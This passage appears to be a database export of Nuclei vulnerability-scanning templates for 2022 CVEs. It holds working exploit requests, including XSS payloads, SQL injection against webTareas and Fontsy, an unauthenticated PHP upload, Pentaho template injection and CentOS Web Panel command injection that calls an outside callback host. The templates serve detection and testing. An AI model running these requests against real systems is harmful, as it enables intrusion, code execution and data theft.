cve-id: CVE-2022-43185\n cwe-id: CWE-79\n epss-score: 0.45754\n epss-percentile: 0.97082\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n tags: 
cve,cve2022,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=holidays/holidays&action=save&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_date=2023-05-22&end_date=2023-05-31\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 4a0a00473045022100bc300fd32b6adf7bc6aac4589f0eb432976dd5e3e894c339bb71185d1b37c6da022043adf86185cdd562f52a3f7407dbe76cf38ac54c42fb933cbf55a15ed9a3b952:922c64590222798bb761d5b6d8e72950", "hash": "716dd9d541d686691a94831d4869fd20", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085b8" }, "name": "CVE-2022-4320.yaml", "content": "id: CVE-2022-4320\n\ninfo:\n name: WordPress Events Calendar <1.4.5 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Events Calendar plugin before 1.4.5 contains multiple cross-site scripting vulnerabilities. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
This vulnerability can be used against both unauthenticated and authenticated users.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: Fixed in version 1.4.5.\n reference:\n - https://wpscan.com/vulnerability/f1244c57-d886-4a6e-8cdb-18404e8c153c\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4320\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-4320\n cwe-id: CWE-79\n epss-score: 0.00092\n epss-percentile: 0.3872\n cpe: cpe:2.3:a:mhsoftware:wordpress_events_calendar_plugin:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: mhsoftware\n product: wordpress_events_calendar_plugin\n framework: wordpress\n tags: cve,cve2022,calendar,event,xss,wordpress,wp,wp-plugin,wpscan,mhsoftware\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX\">'\n - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback='\n - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=-->'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'imgNavLeftXX\\\">'\n - '({});'\n - '>.js'\n condition: or\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220754824a39c96f4cf434e9eb86e0a47441d3e9724d05ac3bd63ca2c7d54c20270022100d913f8ee7c703312dd076bb9fa9fac645bd47d3e8ab78d97ee9e0fa071909843:922c64590222798bb761d5b6d8e72950", "hash": "e3c1be128d7d29fa2db501cad7dfe8b5", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085b9" }, "name": "CVE-2022-4321.yaml", "content": "id: CVE-2022-4321\n\ninfo:\n name: PDF Generator for 
WordPress < 1.1.2 - Cross Site Scripting\n author: r3Y3r53,HuTa0\n severity: medium\n description: |\n The plugin includes a vendored dompdf example file which is susceptible to Reflected Cross-Site Scripting and could be used against high privilege users such as admin\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected WordPress website, potentially leading to unauthorized access, data theft, or further compromise of the website.\n remediation: Fixed in version 1.1.2\n reference:\n - https://wpscan.com/vulnerability/6ac1259c-86d9-428b-ba98-7f3d07910644\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4321\n - https://wordpress.org/plugins/pdf-generator-for-wp/\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/kwalsh-rz/github-action-ecr-scan-test\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-4321\n cwe-id: CWE-79\n epss-score: 0.00078\n epss-percentile: 0.32646\n cpe: cpe:2.3:a:wpswings:pdf_generator_for_wordpress:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wpswings\n product: pdf_generator_for_wordpress\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/pdf-generator-for-wp\"\n tags: cve,cve2022,wpscan,wordpress,wp,wp-plugin,xss,pdf-generator-for-wp,wpswings\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php?keyword=\">'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '>'\n - 'pdf-generator-for-wp'\n - 'Total execution time is'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 
4a0a0047304502210083c8c3f4e22e416c26bdc706267a29aa4b94d13ca7d660eb68252ea62f0060fa022042f44c28eaba59c10e9718743b4c4f9826d6aa75302d56062cefbb4a345e98fd:922c64590222798bb761d5b6d8e72950", "hash": "df202aa0cab8bd7ecb6ea66d1c3ebfe3", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ba" }, "name": "CVE-2022-4325.yaml", "content": "id: CVE-2022-4325\n\ninfo:\n name: WordPress Post Status Notifier Lite <1.10.1 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Post Status Notifier Lite plugin before 1.10.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: Fixed in version 1.10.1.\n reference:\n - https://wpscan.com/vulnerability/5b983c48-6b05-47cf-85cb-28bbeec17395\n - https://wordpress.org/plugins/post-status-notifier-lite/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4325\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-4325\n cwe-id: CWE-79\n epss-score: 0.00078\n epss-percentile: 0.32657\n cpe: cpe:2.3:a:ifeelweb:post_status_notifier_lite:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: ifeelweb\n product: post_status_notifier_lite\n framework: wordpress\n tags: cve,cve2022,wp,wordpress,wpscan,authenticated,xss,wp-plugin,post-status-notifier-lite,ifeelweb\n\nhttp:\n - raw:\n - |\n POST /wp-login.php 
HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/options-general.php?page=post-status-notifier-lite&controller=%3Cscript%3Ealert%28%60document.domain%60%29%3C%2Fscript%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \"\")'\n - 'contains(body_2, \"Post Status Notifier Lite\")'\n condition: and\n# digest: 490a0046304402205206499c7d6a2bedfe29a673b7c4c487f6357884ab5336b30c33d3f7116b4bfd02202e13bd6b2db15b9f638ba8688c91867f9730b8e4efa5df27dbf609ff6a0196f4:922c64590222798bb761d5b6d8e72950", "hash": "91dcb3d94a7d71cfcb53404f0b92598a", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085bb" }, "name": "CVE-2022-4328.yaml", "content": "id: CVE-2022-4328\n\ninfo:\n name: WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload\n author: theamanrawat\n severity: critical\n description: |\n The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.\n remediation: Fixed in version 18.0\n reference:\n - https://wpscan.com/vulnerability/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed\n - https://wordpress.org/plugins/n-media-woocommerce-checkout-fields/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4328\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-4328\n cwe-id: CWE-434\n epss-score: 0.22681\n epss-percentile: 0.96077\n cpe: cpe:2.3:a:najeebmedia:woocommerce_checkout_field_manager:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: najeebmedia\n product: woocommerce_checkout_field_manager\n framework: wordpress\n tags: 
cve2022,cve,wp,n-media-woocommerce-checkout-fields,wpscan,rce,wordpress,wp-plugin,intrusive,najeebmedia\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=------------------------22728be7b3104597\n\n --------------------------22728be7b3104597\n Content-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\n Content-Type: application/octet-stream\n\n \n\n --------------------------22728be7b3104597--\n - |\n GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - fe5df26ce4ca0056ffae8854469c282f\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f22baef697a8a8d3b9cd970350ff7726ecc8317f7519fc4fc7986bc3b90deb640221009b219b5e2ad6ff59b71ad028d818ae581463c01d52d7f535c7efac3e81d60bc5:922c64590222798bb761d5b6d8e72950", "hash": "90c518097ea00ccd7483a407cf212c17", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085bc" }, "name": "CVE-2022-43769.yaml", "content": "id: CVE-2022-43769\n\ninfo:\n name: Hitachi Pentaho Business Analytics Server - Remote Code Execution\n author: dwbzn\n severity: high\n description: |\n Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible to remote code execution via server-side template injection. 
Certain web services can set property values which contain Spring templates that are interpreted downstream, thereby potentially enabling an attacker to execute malware, obtain sensitive information, modify data, and/or perform unauthorized operations without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server.\n remediation: Upgrade to 9.4 with Service Pack 9.4.0.1. For version 9.3, recommend updating to Service Pack 9.3.0.2.\n reference:\n - https://support.pentaho.com/hc/en-us/articles/14455561548301--Resolved-Pentaho-BA-Server-Failure-to-Sanitize-Special-Elements-into-a-Different-Plane-Special-Element-Injection-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43769-\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43769\n - http://packetstormsecurity.com/files/172296/Pentaho-Business-Server-Authentication-Bypass-SSTI-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-43769\n cwe-id: CWE-94,CWE-74\n epss-score: 0.33038\n epss-percentile: 0.96634\n cpe: cpe:2.3:a:hitachi:vantara_pentaho_business_analytics_server:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: hitachi\n product: vantara_pentaho_business_analytics_server\n shodan-query: http.favicon.hash:1749354953\n tags: cve,cve2022,packetstorm,rce,ssti,pentaho,kev,hitachi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&mgrDn=a&pwd=a\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the DNS Interaction\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - \"false\"\n\n - type: word\n part: header\n words:\n - \"application/json\"\n# digest: 
4b0a004830460221008c170d16acd8d4fcd8b061a57759895cb1c1f4d2d844154a2bc28d348695383502210082727ca9d4adcdf1004042ef259119a55de484872ede8cad1aaf0ded1f7c2d8d:922c64590222798bb761d5b6d8e72950", "hash": "bb5804a3275c28ba612d9fce1a1adef2", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085bd" }, "name": "CVE-2022-44290.yaml", "content": "id: CVE-2022-44290\n\ninfo:\n name: WebTareas 2.4p5 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in deleteapprovalstages.php.\n reference:\n - http://webtareas.com/\n - https://github.com/anhdq201/webtareas/issues/2\n - https://nvd.nist.gov/vuln/detail/CVE-2022-44290\n - http://webtareas.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-44290\n cwe-id: CWE-89\n epss-score: 0.01336\n epss-percentile: 0.8578\n cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: webtareas_project\n product: webtareas\n tags: cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project\n\nhttp:\n - raw:\n - |\n POST /general/login.php?session=false HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525\n\n -----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"action\"\n\n login\n -----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"loginForm\"\n\n {{username}}\n -----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"passwordForm\"\n\n {{password}}\n -----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"loginSubmit\"\n\n Log In\n -----------------------------3023071625140724693672385525--\n - |\n @timeout: 
20s\n GET /approvals/deleteapprovalstages.php?id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - duration>=6\n - status_code == 200\n - contains(header, \"text/html\")\n - contains(body, 'Delete the following?')\n condition: and\n# digest: 4a0a00473045022100ec9c9149107256ee388b4fad74e2dd7cb17cd09813c8e78bfee6e1f3fa76f85402206e12fab64eaca7a7280bd62ee2af0e78d716ae1ae94ef685835435bf889b63b8:922c64590222798bb761d5b6d8e72950", "hash": "51f1d9cacd1b5c7c0f79f6aab9651b16", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085be" }, "name": "CVE-2022-44291.yaml", "content": "id: CVE-2022-44291\n\ninfo:\n name: WebTareas 2.4p5 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in phasesets.php.\n reference:\n - http://webtareas.com/\n - https://github.com/anhdq201/webtareas/issues/1\n - https://nvd.nist.gov/vuln/detail/CVE-2022-44291\n - http://webtareas.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-44291\n cwe-id: CWE-89\n epss-score: 0.01336\n epss-percentile: 0.8578\n cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: webtareas_project\n product: webtareas\n tags: cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project\n\nhttp:\n - raw:\n - |\n POST /general/login.php?session=false HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525\n\n -----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"action\"\n\n login\n -----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"loginForm\"\n\n {{username}}\n 
-----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"passwordForm\"\n\n {{password}}\n -----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"loginSubmit\"\n\n Log In\n -----------------------------3023071625140724693672385525--\n - |\n @timeout: 20s\n GET /administration/phasesets.php?mode=delete&id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration_2>=6'\n - 'len(body_2) == 0'\n - 'status_code_2 == 302'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_1, \"webTareasSID\")'\n condition: and\n# digest: 4a0a00473045022100f9fa6e7b1841bcd70d3d68bb92ef27362bce875c298bee65f81acae33f5c999902201fc68f4f443a20fecb39c3509c24b3634548412e25006cef58d5867b3cbfc6e1:922c64590222798bb761d5b6d8e72950", "hash": "c49a44a3d39e60a469edc94a5e7efa12", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085bf" }, "name": "CVE-2022-4447.yaml", "content": "id: CVE-2022-4447\n\ninfo:\n name: WordPress Fontsy <=1.8.6 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n WordPress Fontsy plugin through 1.8.6 is susceptible to SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action. 
An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.\n remediation: |\n Update the Fontsy plugin to the latest version (>=1.8.7) or apply the vendor-provided patch to mitigate the SQL Injection vulnerability.\n reference:\n - https://wpscan.com/vulnerability/6939c405-ac62-4144-bd86-944d7b89d0ad\n - https://wordpress.org/plugins/fontsy/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4447\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-4447\n cwe-id: CWE-89\n epss-score: 0.03134\n epss-percentile: 0.9009\n cpe: cpe:2.3:a:fontsy_project:fontsy:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: fontsy_project\n product: fontsy\n framework: wordpress\n tags: cve,cve2022,wordpress,wp,wpscan,wp-plugin,sqli,fontsy,unauth,fontsy_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n id=-5219 UNION ALL SELECT NULL,NULL,NULL,md5({{num}}),NULL--\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"{{md5(num)}}\")'\n condition: and\n# digest: 4b0a00483046022100d97fe9d2af29c15dc73b8a19c1f69016ed9cf31e60a5767759fe6c56ba2601a2022100d80cb2be444aeac965e4c0abdc2f71d2d232416217054298f34b26cd50c7c429:922c64590222798bb761d5b6d8e72950", "hash": "040d8a76da30e611901ad35f81e7cb01", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085c0" }, "name": "CVE-2022-44877.yaml", "content": "id: CVE-2022-44877\n\ninfo:\n name: CentOS 
Web Panel 7 <0.9.8.1147 - Remote Code Execution\n author: For3stCo1d\n severity: critical\n description: |\n CentOS Web Panel 7 before 0.9.8.1147 is susceptible to remote code execution via entering shell characters in the /login/index.php component. This can allow an attacker to execute arbitrary system commands via crafted HTTP requests and potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade to CentOS Web Panel version 0.9.8.1147 or later to mitigate this vulnerability.\n reference:\n - https://twitter.com/_0xf4n9x_/status/1612068225046675457\n - https://github.com/numanturle/CVE-2022-44877\n - https://gist.github.com/numanturle/c1e82c47f4cba24cff214e904c227386\n - https://nvd.nist.gov/vuln/detail/CVE-2022-44877\n - http://packetstormsecurity.com/files/171725/Control-Web-Panel-7-CWP7-0.9.8.1147-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-44877\n cwe-id: CWE-78\n epss-score: 0.97427\n epss-percentile: 0.99935\n cpe: cpe:2.3:a:control-webpanel:webpanel:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: control-webpanel\n product: webpanel\n shodan-query: http.title:\"Login | Control WebPanel\"\n tags: cve,cve2022,packetstorm,centos,rce,kev,control-webpanel\n\nhttp:\n - raw:\n - |\n POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username=root&password=toor&commit=Login\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - \"Login 
Redirect.\"\n\n - type: status\n status:\n - 302\n\n extractors:\n - type: regex\n group: 1\n regex:\n - '([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+'\n part: interactsh_request\n# digest: 4a0a004730450220251a5e0fed581fcfeb62eda5c7320913dc45d41e9d3a17e40ff963b7ec6bf7bb022100a851f4d7f5205ec1dc955bdd0d285e0d7e380efde8ac49d3dec58ed7a677db6a:922c64590222798bb761d5b6d8e72950", "hash": "d5b605ff9d4497a7b220898385606054", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085c1" }, "name": "CVE-2022-44944.yaml", "content": "id: CVE-2022-44944\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Announcement function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/14\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-44944\n - http://rukovoditel.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-44944\n cwe-id: CWE-79\n epss-score: 0.00091\n epss-percentile: 0.37842\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n shodan-query: http.favicon.hash:-1499940355\n tags: cve2022,cve,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - 
raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&type=announcement&is_active=1&color=default&icon=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&start_date=&end_date=&sort_order=\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 490a0046304402202f7c5ec782c15c9e2283d7a395b38639394668e4926e5256f17bd15c01a48b550220733ea68014deaa76cd6eb149fa40f8dc6cc38bbc1686f370c683bca1e7b15c5e:922c64590222798bb761d5b6d8e72950", "hash": "8556808059116e71251584d800874455", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085c2" }, "name": "CVE-2022-44946.yaml", "content": "id: CVE-2022-44946\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Page function at /index.php?module=help_pages/pages&entities_id=24. 
This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.\n remediation: |\n Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/15\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-44946\n - http://rukovoditel.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-44946\n cwe-id: CWE-79\n epss-score: 0.00091\n epss-percentile: 0.38539\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n shodan-query: http.favicon.hash:-1499940355\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&type=page&is_active=1&position=listing&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&description=\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 
490a00463044022024f1b4397b5259096b3834d56e20ade3350323ef4131fb0cc5c225ad63dedfc3022022204d8791d85002284c41b635deb56440af75f6fbe8bc85afaac26ed3589e62:922c64590222798bb761d5b6d8e72950", "hash": "cb5a9e7841fa98eaee7fe9a80e5f2f59", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085c3" }, "name": "CVE-2022-44947.yaml", "content": "id: CVE-2022-44947\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Highlight Row feature at /index.php?module=entities/listing_types&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Note field after clicking \"Add\".\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/13\n - http://rukovoditel.com/\n - 